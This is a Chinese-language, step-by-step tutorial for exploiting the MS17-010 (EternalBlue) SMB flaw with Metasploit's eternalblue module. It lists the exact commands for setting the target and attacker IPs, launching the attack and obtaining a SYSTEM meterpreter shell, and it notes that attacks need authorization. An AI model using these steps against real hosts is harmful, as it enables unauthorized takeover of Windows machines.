本文将介绍如何使用Metasploit框架攻击MS17-010漏洞,不过需要提醒的是,攻击行为是违法的,只能在授权的情况下进行。
步骤一:打开Kali Linux终端
输入命令 msfconsole 启动Metasploit框架。
步骤二:查找漏洞模块
输入命令 search ms17-010 查找漏洞模块。
步骤三:选择漏洞模块
选择适合的漏洞模块,输入命令 use exploit/windows/smb/ms17_010_eternalblue,使用该漏洞模块。
步骤四:查看漏洞模块的选项
输入命令 show options 查看该漏洞模块的选项。
步骤五:设置目标主机IP地址
输入命令 set RHOSTS 192.168.0.1,将IP地址替换成实际的靶机IP地址。
步骤六:设置攻击者IP地址
输入命令 set LHOST 192.168.0.2,将IP地址替换成实际的攻击者IP地址。
步骤七:设置目标主机操作系统
输入命令 set target 2,将数字替换成目标主机的操作系统编号(例如:2表示Windows Server 2008 R2)。
步骤八:开始攻击
输入命令 run,开始攻击。
步骤九:等待攻击完成
如果成功获取了SYSTEM权限,会出现meterpreter的命令行界面。
步骤十:查看目标主机的系统信息
输入命令 sysinfo,查看目标主机的系统信息。
以上就是使用Metasploit框架攻击MS17-010漏洞的步骤。需要注意的是,攻击行为是违法的,只能在授权的情况下进行。
